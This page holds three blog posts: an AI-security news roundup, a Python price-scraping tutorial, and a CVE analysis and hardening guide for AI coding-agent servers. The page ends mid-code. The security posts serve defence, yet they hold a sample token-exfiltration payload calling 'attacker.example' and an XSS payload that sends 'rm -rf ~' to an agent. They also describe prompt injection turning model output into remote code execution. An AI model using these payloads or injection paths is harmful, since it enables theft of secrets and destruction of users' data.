The Practical Developer

A constructive and inclusive social network for software developers.

This Week in AI Security: OpenAI Codex Hacked, LiteLLM Supply Chain Attack, Claude Gets Computer Control

2026-03-31 06:35:45

This was the week AI security stopped being theoretical.

Three events, all within days of each other, paint a picture that every developer building with AI tools needs to understand.

1. OpenAI Codex: Command Injection via Branch Names

BeyondTrust's Phantom Labs team (Tyler Jespersen) found a critical vulnerability in OpenAI Codex affecting all Codex users.

The attack: command injection through GitHub branch names in task creation requests. An attacker could craft a malicious branch name that, when processed by Codex, would exfiltrate a victim's GitHub tokens to an attacker-controlled server.

The impact: full read/write access to a victim's entire codebase. Lateral movement across repositories. Everything.

OpenAI patched it quickly. But the pattern is what matters: AI coding tools inherit trust from user context (GitHub tokens, env vars, API keys) but don't treat that context as a security boundary.

Every AI coding tool that touches git has this same attack surface. Basically nobody is auditing for it.
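The bug class is easy to audit for. A minimal sketch of the pattern (not OpenAI's actual code; the branch name and payload are hypothetical) — untrusted input interpolated into a shell string versus passed as a plain argument:

```python
# Illustrative sketch of the bug class, not OpenAI's actual code: a branch
# name interpolated into a shell string is attacker-controlled shell.
# The payload below is hypothetical.
import shlex

branch = "$(curl attacker.example/steal?t=$GITHUB_TOKEN)"

# Vulnerable: run with shell=True, the $() subshell executes.
unsafe_cmd = f"git checkout {branch}"

# Safer: pass untrusted input as a single argv element...
argv = ["git", "checkout", branch]

# ...or quote it if a shell string is unavoidable.
safe_cmd = f"git checkout {shlex.quote(branch)}"
print(safe_cmd)
```

The fix is boring and decades old; the novelty is only that the untrusted input now arrives through an AI agent's task context.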

2. LiteLLM Supply Chain Attack: 47K Downloads in 46 Minutes

On March 24, 2026, litellm version 1.82.8 was published to PyPI with a malicious .pth file that executed automatically on every Python process startup.
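The .pth mechanism is a standard CPython feature, which is what makes it such an effective implant: any line in a .pth file that begins with `import` is executed when the `site` module processes the directory at interpreter startup. A harmless demonstration in a temp directory:

```python
# Demonstrates why a malicious .pth is so effective: site processing
# executes any .pth line that starts with "import" -- on every startup.
import os
import site
import tempfile

d = tempfile.mkdtemp()
with open(os.path.join(d, "demo.pth"), "w") as f:
    # A real payload would hide a stager here instead of an env var.
    f.write("import os; os.environ['PTH_DEMO_RAN'] = '1'\n")

site.addsitedir(d)  # what interpreter startup does for site-packages dirs
print(os.environ.get("PTH_DEMO_RAN"))  # prints: 1
```

No function needs to be called, no module needs to be imported by your code: the payload runs before your first line does.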

The payload: a multi-stage credential stealer targeting AI pipelines and cloud secrets. The same threat actor (TeamPCP) had already compromised Trivy, KICS, and Telnyx across five supply chain ecosystems.

The timeline:

  • 13 minutes between the compromised publish and detection
  • 47,000 downloads before the package was pulled
  • 95 million monthly downloads for the litellm package overall

This is the package that most AI proxy servers use. If you're routing API calls through litellm (and many vibe-coded apps do), you were exposed.

Endor Labs just published their analysis showing this is the same attacker behind the Trivy and KICS compromises. This is a coordinated campaign targeting AI infrastructure specifically.

3. Claude Gets Computer Use: The Closed Loop

Anthropic released Computer Use for Claude Code. Claude can now open your apps, click through your UI, and test what it built, all from the CLI.

The capability is impressive. The security implications are sobering.

With Computer Use, the feedback loop is fully closed: Claude writes code, runs it, tests it visually, finds bugs, fixes them, deploys. No human in the loop checking if:

  • Auth middleware actually works
  • API keys are properly scoped
  • Rate limiting is real
  • Environment variables aren't hardcoded
  • The dependencies being installed are legitimate

This isn't Claude's fault. The tool works as designed. But it means insecure code ships faster than ever, with more confidence, because "it tested itself."
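One item on that checklist can be automated today: flagging likely hardcoded secrets before code ships. A minimal sketch (the patterns are illustrative, not a complete ruleset):

```python
# Sketch of one automated gate from the checklist above: flag likely
# hardcoded secrets in source. Patterns are illustrative, not exhaustive.
import re

SECRET_PATTERNS = [
    re.compile(r"sk-[A-Za-z0-9]{20,}"),            # OpenAI-style keys
    re.compile(r"AKIA[0-9A-Z]{16}"),               # AWS access key IDs
    re.compile(r"(?i)(api[_-]?key|secret)\s*=\s*['\"][^'\"]{8,}"),
]

def find_hardcoded_secrets(source: str) -> list[str]:
    hits = []
    for pattern in SECRET_PATTERNS:
        hits.extend(match.group(0) for match in pattern.finditer(source))
    return hits
```

Run it over every file the agent touches before committing; it catches the dumbest mistakes, which are also the most common ones.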

The Pattern

All three events share a common thread: trust boundaries in AI development are poorly defined.

  • Codex trusted user-supplied branch names as safe input
  • Vibe coders trusted pip install litellm as a safe operation
  • Claude Computer Use trusts that the code it wrote is correct because the UI loaded

Meanwhile, 9to5Mac reports that vibe coding has broken Apple's App Store review queue. Wait times are up from less than a day to 3+ days. The volume of AI-generated app submissions has overwhelmed human reviewers.

What comes next is predictable: automated security gates. Apple, Google, and every app marketplace will add automated scanning. Apps with exposed API keys, missing authentication, and hardcoded secrets will get auto-rejected before a human ever looks at them.

What You Can Do Today

If you're shipping vibe-coded apps:

  1. Pin your dependencies. Use lockfiles. Verify hashes. Don't pip install without knowing exactly what version you're getting.

  2. Treat AI-generated code as untrusted input. Review it the way you'd review a PR from a new hire. The code works, but "works" and "secure" are different things.

  3. Scan before shipping. Tools like VibeCheck scan your GitHub repos and deployed URLs for the common vibe coding mistakes: exposed API keys, missing auth, open endpoints, insecure headers.

  4. Assume your secrets are exposed. If you've ever hardcoded an API key in a vibe-coded project, rotate it now. Not tomorrow. Now.

  5. Add rate limiting to every public endpoint. The bots are faster than your users.
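The hash check behind item 1 is simple enough to sketch: it's the same comparison pip performs in hash-checking mode when a requirements file pins sha256 digests.

```python
# Hedged sketch of the hash check behind dependency pinning: compare a
# downloaded artifact's sha256 against the pinned digest before trusting it.
import hashlib

def verify_artifact(path: str, expected_sha256: str) -> bool:
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest() == expected_sha256
```

A compromised release like litellm 1.82.8 has a different digest than the pinned one, so the install fails instead of executing the payload.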

The AI coding revolution is real. The security crisis is also real. They're the same thing.

I track vibe coding security tools and incidents at notelon.ai. Free scanner, no signup required.

I automated competitor price tracking with Python (saved 4 hours per week)

2026-03-31 06:35:34


Was spending every Monday morning checking 23 competitor product pages. Copy URL, open tab, scroll to price, write it down. Repeat. 3 hours 47 minutes gone on average.

Decided to automate it.

The manual process was killing me

Running a small e-commerce thing on the side. Needed to stay competitive on pricing. But manually checking prices across Amazon, eBay, and niche sites? Tedious as hell.

Spreadsheet had columns for:

  • Product name
  • Competitor URL
  • Current price
  • Last updated

Every. Single. Week. Manually.

First attempt: just scrape it

Thought I'd write a quick script. Grab HTML, parse price, done.

import requests
from bs4 import BeautifulSoup

url = "https://example.com/product/123"
response = requests.get(url)
soup = BeautifulSoup(response.text, 'html.parser')
price = soup.find('span', class_='price').text

Worked for maybe 3 sites. Then:

  • Amazon blocked me (User-Agent issue)
  • JavaScript rendered prices didn't show up
  • Some sites had weird HTML structures

Back to manual checking. Annoying.

Ended up fixing it in a couple of ways

Split the problem:

Amazon/eBay (big sites): Used existing scraper APIs instead of fighting detection. Thought I could beat Amazon's bot detection myself. I couldn't. ParseForge has Amazon product scrapers that handle that stuff already. Saved me from spending a week on proxy rotation.

Small sites: Basic requests + BeautifulSoup worked fine. These sites don't have serious bot detection.

Storage: Just appended to CSV. Thought about Postgres or something fancier. Then I realized weekly price checks = maybe 1,200 rows per year. CSV opens in Excel. Done.

Script looks something like:

import csv
import requests
from bs4 import BeautifulSoup
from datetime import datetime

# Small site scraping
def get_basic_price(url, selector):
    try:
        response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0'}, timeout=10)
        soup = BeautifulSoup(response.text, 'html.parser')
        price_text = soup.select_one(selector).text
        # Clean: "$19.99" -> 19.99
        return float(price_text.replace('$', '').replace(',', '').strip())
    except Exception:
        # Bad selector, timeout, blocked request -- log it and move on
        return None

# Amazon/big sites: use API
def get_amazon_price(product_id):
    # Call scraper API here
    # Returns structured data (price, title, rating, etc.)
    pass

# Weekly run
products = [
    {'name': 'Widget A', 'url': 'https://smallsite.com/widget-a', 'selector': '.price'},
    {'name': 'Widget B', 'asin': 'B08XYZ123', 'platform': 'amazon'},
]

results = []
for product in products:
    if 'asin' in product:
        price = get_amazon_price(product['asin'])
    else:
        price = get_basic_price(product['url'], product['selector'])

    results.append({
        'product': product['name'],
        'price': price,
        'date': datetime.now().strftime('%Y-%m-%d'),
    })

# Save to CSV (write the header once, when the file doesn't exist yet)
import os
write_header = not os.path.exists('competitor_prices.csv')
with open('competitor_prices.csv', 'a', newline='') as f:
    writer = csv.DictWriter(f, fieldnames=['product', 'price', 'date'])
    if write_header:
        writer.writeheader()
    writer.writerows(results)

Now runs every Monday via cron. Takes 47 seconds instead of 4+ hours.

Couple things that made it actually work

Don't fight big sites

  • Amazon/eBay have serious anti-bot defenses
  • Using existing tools (APIs, scrapers) beats debugging proxies for weeks
  • Small sites? Basic requests works fine

Error handling matters more than I thought

  • If one site fails, script continues with the rest
  • Logs failures to separate file
  • I check errors once a month (most are just temporary site changes)

CSV is good enough

  • Opens in Excel
  • Fast enough for weekly checks
  • No database maintenance

Stuff I'd change

Honestly would add:

  • Price change alerts (email when competitor drops >10%)
  • Chart generation (see trends)
  • More product categories

But current version does the job. 4 hours back per week.
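The first item on that wishlist (alert on >10% drops) is a small addition on top of the CSV. A sketch, assuming the file has a header row with product, price, and date columns:

```python
# Sketch of the ">10% price drop" alert idea: compare the last two
# recorded prices per product. Assumes a header row (product, price, date).
import csv
from collections import defaultdict

def find_price_drops(csv_path, threshold=0.10):
    history = defaultdict(list)
    with open(csv_path, newline='') as f:
        for row in csv.DictReader(f):
            if row['price']:
                history[row['product']].append(float(row['price']))
    drops = []
    for product, prices in history.items():
        if len(prices) >= 2 and prices[-2] > 0:
            change = (prices[-2] - prices[-1]) / prices[-2]
            if change > threshold:
                drops.append((product, prices[-2], prices[-1]))
    return drops
```

Wire the returned list into whatever notification you already check (email, Slack, whatever) and the Monday review becomes "read one message."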

Try it yourself

Basic approach:

  1. List your competitor URLs
  2. Figure out price selectors (browser inspector)
  3. Use requests for simple sites
  4. Use APIs/tools for complex sites (Amazon, eBay)
  5. Save to CSV
  6. Cron it

ParseForge has scrapers for Amazon, eBay, and Walmart if you're tracking those. It handles the annoying stuff, though you still have to clean the data yourself.

Went from manual Monday drudgery to automated. Worth the weekend it took to build.

Your AI Coding Agent Has Root Access to Your Machine. Does Anything Else?

2026-03-31 06:30:41

TL;DR

Two critical vulnerabilities — CVE-2026-22812 (CVSS 8.8) and CVE-2026-22813 (CVSS 9.6) — affect the most widely deployed open-source AI coding agent platforms. 220,000+ instances are exposed on the public internet with no authentication. 15,200 are confirmed vulnerable to unauthenticated remote code execution. But the exposure isn't limited to cloud servers — the same agent running on your Mac Mini under your desk has the same root-level access to your files, your credentials, and your network. This article provides the technical analysis, the exposure data, remediation for both VPS and local hardware deployments, and a 5-layer defense architecture that works regardless of where your agent runs.

The machine under your desk

Apple cannot keep the Mac Mini in stock. The M4 and M4 Pro configurations are backordered across most retailers, and the reason is not what Apple planned for. Developers are buying them to run AI coding agents locally — specifically OpenClaw, which needs Apple Silicon's unified memory architecture for local LLM inference.

The logic makes sense on paper. A $600 Mac Mini with 16GB of unified memory runs a 7B parameter model fast enough for real-time coding assistance. A $1,400 M4 Pro with 48GB runs 34B models comfortably. No cloud costs. No API rate limits. No data leaving your network. Private, fast, and owned.

There is one problem. The agent running on that Mac Mini has the same privileges as the user who launched it. On most developer machines, that means:

  • Full read/write access to ~/ — every project, every .env file, every SSH key
  • Access to the macOS Keychain if unlocked
  • Ability to install packages, modify system files, and execute arbitrary shell commands
  • Network access to every service on the local network — NAS drives, printers, other machines
  • No sandboxing, no firewall rules, no permission boundaries

A Meta security researcher had to physically unplug her Mac Mini to stop an AI coding agent from deleting her email inbox. The agent was running with full system permissions and connected to a compromised skill package. It began executing destructive commands that could not be stopped through the UI because the WebSocket connection was being used by the attacker's injected scripts.

That incident happened on a local machine with no internet exposure. The attack vector was not a network exploit — it was a malicious package in the agent's skill chain.

For the 220,000+ instances running on VPS infrastructure with no authentication and no firewall, the same attack can be executed remotely by anyone on the internet.

The industry spent two months talking about the 220,000 number. What it missed is that the number only counts servers. It does not count the desks.

Two CVEs, one architectural failure

CVE-2026-22812: Unauthenticated Remote Code Execution

CVE ID: CVE-2026-22812
CVSS Score: 8.8 (High)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Affected Software: OpenCode HTTP server (serve mode), OpenClaw instances
Discovery: Reported via NVD/NIST, confirmed by SecurityScorecard STRIKE team

When an AI coding agent runs in serve mode — exposing an HTTP and WebSocket interface for browser-based interaction — the server binds to 0.0.0.0 by default. In versions prior to 1.1.10, this server has no authentication mechanism whatsoever. Even in 1.1.10+, where the server is disabled by default, enabling it provides only optional Basic Auth that most deployments skip.

Any process on the network — or anyone on the internet if the server is publicly reachable — can:

  1. Execute arbitrary shell commands with the user's full privileges
  2. Read and write any file accessible to the running process
  3. Install packages, modify system configurations, exfiltrate data
  4. Pivot to other services running on the same host or network

The agent is not a code assistant. It is a full remote shell with an AI interface.

On a VPS: if port 4096 is open, anyone on the internet has shell access with the agent user's full privileges.
On a Mac Mini: if the agent binds to 0.0.0.0 instead of 127.0.0.1, every device on the local network has that same access. On coffee shop WiFi, in a coworking space, in a hotel — that is everyone in the room.
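Either scenario can be checked with a few lines of Python run from another machine on the network (4096 is the default port named in this article; adjust for your deployment):

```python
# Defensive reachability sketch: can this host connect to the agent's
# port? 4096 is the article's default; adjust for your deployment.
import socket

def port_is_reachable(host: str, port: int, timeout: float = 2.0) -> bool:
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False
```

If this returns True when pointed at your Mac Mini's LAN IP from a second device, whatever owns that port is exposed beyond localhost.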

CVSS vector breakdown

  • Attack Vector: Network (exploitable remotely)
  • Attack Complexity: Low (no special conditions required)
  • Privileges Required: None (no authentication needed)
  • User Interaction: None (no victim action required)
  • Scope: Unchanged (stays within the vulnerable component)
  • Confidentiality: High (full read access)
  • Integrity: High (full write access)
  • Availability: High (full denial of service possible)

This is a trivially exploitable vulnerability. If the port is reachable, the system is compromised.

CVE-2026-22813: XSS-to-RCE via LLM Output

CVE ID: CVE-2026-22813
CVSS Score: 9.6 (Critical)
Affected Software: OpenClaw web UI

The web interface that renders AI agent output does not sanitize the markdown and HTML returned by the language model. An attacker who can influence the LLM's output — through prompt injection, malicious context documents, or compromised training data — can inject arbitrary JavaScript that executes in the user's browser session.

Because the browser session has an active WebSocket connection to the agent backend, this JavaScript can send commands to the agent as if the user typed them, exfiltrate the contents of the current session, execute shell commands through the agent's execution interface, and persist across sessions if the injected script writes to the agent's context files.

This is the vulnerability that matters most for Mac Mini owners. CVE-2026-22812 requires network access to the agent's port. CVE-2026-22813 does not. It requires only that the agent processes a file, package, or repository that contains adversarial content. Given that AI coding agents routinely clone repositories, install npm/pip/cargo packages, read documentation files, and process code review comments — the attack surface is every piece of content the agent interacts with.

The Mac Mini on your desk. Running a local model. No cloud connection. Still vulnerable to CVE-2026-22813 through a poisoned package.json or a malicious code review comment.
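The bluntest mitigation for this class of bug is to escape model output before the browser renders it, so injected markup displays as text instead of executing. A minimal sketch (real UIs that want rich markdown need an allowlist sanitizer rather than blanket escaping; the payload below is illustrative):

```python
# Bluntest possible mitigation sketch: escape LLM output before the
# browser renders it. Injected markup then displays as text.
import html

def render_agent_output(raw: str) -> str:
    return html.escape(raw)

payload = '<img src=x onerror="agentSocket.send(\'run rm -rf ~\')">'
print(render_agent_output(payload))
```

The point is architectural: output from the model must be treated as untrusted, exactly like input from a user.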

The exposure data

Between January and March 2026, multiple independent security research groups conducted internet-wide scans targeting AI coding agent infrastructure:

  • OpenClaw instances exposed on the public internet: 220,000+ (Censys, Bitsight, Penligent)
  • Instances confirmed vulnerable to RCE (CVE-2026-22812): 15,200 (Penligent)
  • Instances correlated with prior breach activity: 53,300 (SecurityScorecard STRIKE team)
  • Malicious packages in the ClawHub skill marketplace: 1,184 (CyberDesserts)
  • Leaked API tokens (Supabase breach): 1,500,000 (Infosecurity Magazine)
  • Leaked email addresses (same breach): 35,000 (Infosecurity Magazine)

These numbers are the ones that made the news. They count VPS deployments — Hetzner, DigitalOcean, Linode, Contabo — where a developer provisioned a server, installed the agent, started serve mode, and did not configure a firewall.

What they do not count: Mac Minis on home networks. Development laptops in coworking spaces. Workstations in offices with flat network topologies. These machines are not indexed by Censys. They are not visible to Shodan. But if the agent's HTTP server binds to anything other than 127.0.0.1, every device on the same network segment has the same unauthenticated access that the internet has to those 220,000 VPS instances.

The 220,000 number is a floor. The actual exposure includes every unsandboxed AI coding agent running on every machine where the developer has not explicitly configured network isolation. The Mac Mini shortage suggests that number is growing, not shrinking.

The supply chain problem

The 1,184 malicious packages discovered in the ClawHub skill marketplace represent a systemic supply chain compromise. These packages masqueraded as legitimate MCP skills but contained credential harvesters, reverse shells, cryptominers, and data exfiltration routines.

This is the attack path that bypasses all network-level defenses. A tunnel does not help if the agent itself installs a malicious package that reads ~/.ssh/id_rsa and uploads it to an attacker's server. A firewall does not help if the package phones home through an outbound HTTPS connection that looks identical to a legitimate API call.

Defense requires both network isolation (Layers 1–3) and permission scoping (Layer 5). Neither alone is sufficient.

Why this happened

The root cause is not a coding error. It is an architectural assumption.

AI coding agents were designed as local development tools. They assume a trusted network — your laptop, your home WiFi. The HTTP server is a convenience feature: start the agent, open a browser tab, start coding.

That assumption fails in two directions simultaneously:

Direction 1: Servers. Developers run agents on VPS infrastructure because they need persistent execution, shared team access, and GPU availability. The agent's HTTP server, designed for localhost, is now reachable from the public internet. This produced the 220,000 exposed instances.

Direction 2: Local hardware at scale. The Mac Mini shortage proves that developers are deploying AI agents on physical hardware in volumes that matter. These machines sit on home networks, office networks, and coffee shop WiFi. They are not behind firewalls. They are not running in sandboxes. The agent has the same access to the filesystem, the network, and the macOS Keychain that the developer does. The difference from the VPS scenario is visibility — no one is scanning home networks, so the exposure goes unreported.

Both directions share the same gap: the tooling provided zero infrastructure guidance. No documentation for firewall configuration. No reverse proxy templates. No authentication integration. No sandboxing guide for macOS. No permission scoping.

Developers were told "start the server and open a browser." They did.

Reproduction methodology

The following describes the verification methodology used by researchers. This information is provided for defensive purposes — to help teams verify whether their own instances are vulnerable.

For VPS deployments

Step 1: Use Censys, Shodan, or any internet-facing port scanner to identify hosts running the agent's HTTP server. The default port is 4096. The server responds with a distinctive HTTP response that includes WebSocket upgrade headers and the agent's UI HTML.

GET / HTTP/1.1
Host: <target-ip>:4096

A vulnerable instance returns a 200 response with the full agent interface. There is no login page. There is no authentication challenge.

Step 2: Connect to the WebSocket endpoint. The agent accepts commands in its standard message format. Any command that the agent can execute — file operations, shell commands, package installations — is available to the attacker.

Step 3: Send a benign verification command (e.g., whoami, hostname, uname -a). If the agent returns system information, the instance is confirmed vulnerable.

Important: Do not execute destructive commands. Do not access, copy, or modify any data. Verification should confirm the vulnerability exists and stop. Report findings to the instance owner if identifiable.

For local hardware (Mac Mini, workstations)

Step 1: On the machine running the agent, check what address the server is bound to:

# macOS
lsof -i :4096

# Linux
ss -tlnp | grep 4096

If the output shows *:4096 or 0.0.0.0:4096, the agent is listening on all network interfaces — not just localhost. Any device on the same network can connect.

Step 2: From another device on the same network (phone, laptop, tablet), open a browser and navigate to http://<mac-mini-ip>:4096. If the agent's interface loads, the machine is exposed to the local network.

Step 3: Check what the agent process has access to:

# What user is running the agent?
whoami

# What files are readable?
ls ~/

# Is the macOS Keychain accessible?
security list-keychains

# Are SSH keys present?
ls ~/.ssh/

# Are environment variables set with API keys?
env | grep -i key

In the majority of local installations, the agent runs as the primary user account — which means full access to the home directory, all development projects, all SSH keys, and all environment variables containing API credentials.

Remediation: 5-layer defense-in-depth

The following architecture addresses both CVEs at the infrastructure level. The first three layers apply to VPS deployments. All five layers apply to any deployment, including local hardware.

Layer 1: Network isolation — eliminate the public attack surface

For VPS deployments:

Use an outbound-only encrypted tunnel instead of opening inbound ports. Cloudflare Tunnel (cloudflared) establishes a connection from your server to Cloudflare's network using outbound-only QUIC connections on port 7844. No inbound ports are opened. The server's IP address is never exposed. All traffic routes through Cloudflare's 330+ city anycast network.

# Install cloudflared
curl -fsSL https://pkg.cloudflare.com/cloudflare-main.gpg \
  | gpg --dearmor -o /usr/share/keyrings/cloudflare.gpg
echo "deb [signed-by=/usr/share/keyrings/cloudflare.gpg] \
  https://pkg.cloudflare.com/cloudflared $(lsb_release -cs) main" \
  | tee /etc/apt/sources.list.d/cloudflared.list
apt update && apt install cloudflared

# Create tunnel (requires Cloudflare API token)
cloudflared tunnel create my-agent-tunnel

# Configure: route agent.yourdomain.com → localhost:4096
# Catch-all: return 404 for all other hostnames

Configuration note: Set the tunnel's catch-all to http_status:404. This ensures that any request arriving at Cloudflare that does not match your specific hostname is rejected before it reaches your server.

For Mac Mini / local hardware:

Force the agent to bind to 127.0.0.1 only — never 0.0.0.0. This restricts the HTTP server to connections originating from the same machine.

# If the agent supports a bind address flag:
opencode serve --host 127.0.0.1

# Verify it's not listening on all interfaces:
lsof -i :4096
# Should show: 127.0.0.1:4096, NOT *:4096
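What the bind address controls can be shown directly with a raw socket (illustrative; the port number is arbitrary here):

```python
# What the bind address controls: a loopback socket is reachable only
# from this machine; binding 0.0.0.0 would listen on every interface.
import socket

loopback = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
loopback.bind(("127.0.0.1", 0))   # same-machine clients only
loopback.listen(1)
print(loopback.getsockname()[0])  # prints: 127.0.0.1

# exposed = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# exposed.bind(("0.0.0.0", 4096)) # every device on the network can connect
```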

If you need to access the agent from another device (e.g., your laptop connecting to a Mac Mini on your desk), use SSH port forwarding instead of exposing the port:

# From your laptop, forward local port 4096 to the Mac Mini's localhost:4096
ssh -L 4096:127.0.0.1:4096 user@mac-mini-ip

# Then open http://localhost:4096 in your laptop's browser
# Traffic is encrypted through the SSH tunnel — never exposed on the network

For persistent remote access, Cloudflare Tunnel works on macOS as well:

# Install on macOS
brew install cloudflare/cloudflare/cloudflared

# Same tunnel configuration as Linux — agent stays on localhost,
# Cloudflare handles authenticated remote access

What this prevents: On VPS — direct IP scanning, port-based attacks, DDoS. On local hardware — exposure to every device on the same WiFi or LAN. The agent becomes reachable only through authenticated channels.

Layer 2: Identity verification — gate every request

Cloudflare Zero Trust Access enforces authentication at the edge. Before a request is proxied to your tunnel (and therefore your server or Mac Mini), the user must authenticate through an identity provider — Google, GitHub, one-time pin via email, or any SAML/OIDC provider.

Access Policy:
  Action: Allow
  Include: Emails ending in @yourdomain.com
  Session duration: 24 hours
  Cookie: SameSite=None, HttpOnly, Binding=Enabled

Critical configuration for WebSocket agents: The SameSite=None and Binding Cookie settings are required for AI coding agents that use WebSocket connections. Without them, the browser's WebSocket upgrade request will fail the cookie check and the session will drop mid-conversation. This is a common misconfiguration that causes intermittent disconnections.

What this prevents: Unauthorized access from anyone who does not possess valid identity credentials. Even if an attacker discovers the agent's URL, they see a Cloudflare login page — not the agent interface.

Layer 3: Application authentication — defense in depth

Enable authentication on the agent's HTTP server itself as a secondary gate.

# Generate a high-entropy password
AGENT_PASSWORD=$(openssl rand -base64 24)

# Linux (systemd drop-in -- note the [Service] section and Environment= syntax):
mkdir -p /etc/systemd/system/opencode.service.d
cat > /etc/systemd/system/opencode.service.d/override.conf << EOF
[Service]
Environment=OPENCODE_SERVER_PASSWORD=$AGENT_PASSWORD
EOF
systemctl daemon-reload && systemctl restart opencode

# macOS (launchd or manual):
export OPENCODE_SERVER_PASSWORD=$AGENT_PASSWORD
opencode serve

Important caveat: When Zero Trust Access is active, enabling Basic Auth on the agent server can create an authentication loop: the server answers 401 before Access has authenticated the request, and Access responds to the 401 by redirecting to login again. The correct implementation is conditional: set the server password only when Zero Trust is not configured. When Zero Trust is active, it is the authentication layer.

Layer 4: Host hardening — reduce the blast radius

For VPS (Ubuntu/Debian):

# Firewall: deny all inbound, allow SSH only
ufw default deny incoming
ufw default allow outgoing
ufw allow ssh
ufw --force enable
# Port 4096 is NOT opened — all agent traffic goes through the tunnel

# Brute force protection
apt install -y fail2ban
systemctl enable fail2ban

# Kernel hardening
cat >> /etc/sysctl.d/99-hardening.conf << 'EOF'
net.ipv4.tcp_syncookies = 1
net.ipv4.conf.all.rp_filter = 1
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.conf.all.accept_redirects = 0
kernel.randomize_va_space = 2
net.ipv4.conf.all.log_martians = 1
EOF
sysctl --system

# Automatic security updates
apt install -y unattended-upgrades
dpkg-reconfigure -plow unattended-upgrades

What each control does:

  • UFW (default deny): blocks all inbound traffic except SSH
  • fail2ban: bans IPs after repeated failed SSH attempts
  • SYN cookies: prevent SYN flood denial of service
  • Reverse path filtering: prevents IP spoofing
  • ICMP broadcast ignore: prevents Smurf amplification attacks
  • Redirect rejection: prevents ICMP redirect hijacking
  • ASLR (full): randomizes memory addresses to defeat buffer overflow exploits
  • Martian logging: logs packets with impossible source addresses
  • Unattended upgrades: automatically applies security patches

For Mac Mini / macOS:

macOS does not need the same kernel hardening (it ships with ASLR, SIP, and Gatekeeper enabled). The priorities are different:

# Enable the macOS firewall
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on

# Block all incoming connections (allow only essential services)
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setblockall on

# Enable stealth mode (don't respond to pings or port scans)
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setstealthmode on

# Verify settings
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate

Additional macOS-specific hardening:

# Disable Remote Login (SSH) if you don't need it
sudo systemsetup -setremotelogin off

# Disable Remote Management
sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart \
  -deactivate -configure -access -off

# Enable FileVault (full disk encryption) — critical if the machine is physically accessible
sudo fdesetup enable

# Automatic updates
sudo softwareupdate --schedule on

What each control does:

  • macOS Firewall (block all): blocks all incoming connections
  • Stealth mode: makes the machine invisible to network scans
  • FileVault: encrypts the entire disk, protecting data if the machine is stolen
  • Remote Login off: disables SSH access when not needed
  • Automatic updates: applies security patches as they ship

Post-deployment: Disable SSH password authentication on both VPS and macOS. Use key-only access:

# Linux
sed -i 's/^#\?PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config
systemctl restart sshd

# macOS (if SSH is enabled)
sudo sed -i '' 's/^#PasswordAuthentication yes/PasswordAuthentication no/' /etc/ssh/sshd_config
sudo launchctl stop com.openssh.sshd && sudo launchctl start com.openssh.sshd

Layer 5: Scoped permissions — limit what each agent can do

This layer is the one that defends against CVE-2026-22813 and supply chain attacks — the threats that bypass all network-level protection. It applies equally to VPS deployments and Mac Mini setups.

MCP servers — now governed by the Linux Foundation with backing from Anthropic, OpenAI, Google, Microsoft, AWS, and Cloudflare — provide a standardized interface between AI agents and external tools. The critical security feature of MCP is that each server connection can be independently scoped:

  • Read-only agents receive MCP connections with write: false — they can analyze code, run audits, and report findings, but cannot modify files
  • Scoped write agents receive MCP connections limited to specific operations — a deployment agent can interact with Cloudflare Workers but cannot modify DNS records outside its configured zone
  • No-shell agents receive MCP connections with bash: false — they cannot execute arbitrary commands regardless of what the LLM requests
# Example: read-only security auditor
agent:
  name: security-reviewer
  tools:
    write: false
    edit: false
    bash: false
  mcp:
    - cloudflare-docs    # Can read documentation
    - github             # Can read repositories
    # Cannot: deploy, modify, execute

This is not behavioral guardrailing. The agent cannot prompt its way past these restrictions. The MCP server simply does not expose write operations to agents configured as read-only. The permission boundary is enforced at the infrastructure layer, not the prompt layer.

For Mac Mini owners specifically: This layer is your primary defense against supply chain attacks. A malicious package installed by the agent can execute code with the agent's permissions. If the agent has unrestricted filesystem and shell access, the package has unrestricted filesystem and shell access. Scoped MCP permissions mean that even if the agent is tricked into installing a malicious package, the damage is bounded by the agent's configured permission set — not by the user's full system access.
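The enforcement point matters more than the policy format. An illustrative sketch (not the MCP wire protocol): the permission check lives in the dispatch layer, so a read-only agent cannot reach write or shell tools regardless of what the model asks for. The agent names and tool registry below are hypothetical.

```python
# Illustrative sketch, not the MCP wire protocol: the permission check
# lives in the dispatcher, outside anything the model can influence.
from dataclasses import dataclass

@dataclass(frozen=True)
class AgentPolicy:
    name: str
    allowed_tools: frozenset

class ToolDispatcher:
    def __init__(self, policy: AgentPolicy, tools: dict):
        self.policy = policy
        self.tools = tools

    def call(self, tool: str, *args):
        if tool not in self.policy.allowed_tools:
            raise PermissionError(f"{self.policy.name} may not use {tool!r}")
        return self.tools[tool](*args)

# Hypothetical read-only auditor: "read" is exposed, "bash" is not.
auditor = ToolDispatcher(
    AgentPolicy("security-reviewer", frozenset({"read"})),
    {"read": lambda path: f"contents of {path}", "bash": lambda cmd: "..."},
)
```

No amount of prompt injection changes what `allowed_tools` contains; the denial happens before the tool code ever runs.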

What you should do today

If you run an agent on a VPS

  1. Check exposure now. Run ss -tlnp | grep 4096 — if the port is listening, check if it's reachable from outside. Search Censys or Shodan for your server's IP.
  2. Block the port. ufw deny 4096 — the single fastest remediation.
  3. Set up a tunnel. Cloudflare Tunnel is free. Remove the port from the internet entirely.
  4. Harden the host. Apply kernel parameters, enable fail2ban, enable automatic updates.
  5. Scope your agents. Restrict MCP permissions. Audit agents should be read-only.
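If you'd rather script the exposure check than eyeball `ss` output, a minimal probe looks like the sketch below. This is illustrative only — `ss`, Censys, and Shodan remain the authoritative checks, and port 4096 is just the agent port discussed in this article.

```python
# Minimal TCP port-exposure probe (illustrative sketch).
# Attempts a connect to host:port and reports whether anything answers.
import socket

def is_port_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Return True if a TCP listener accepts connections on host:port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
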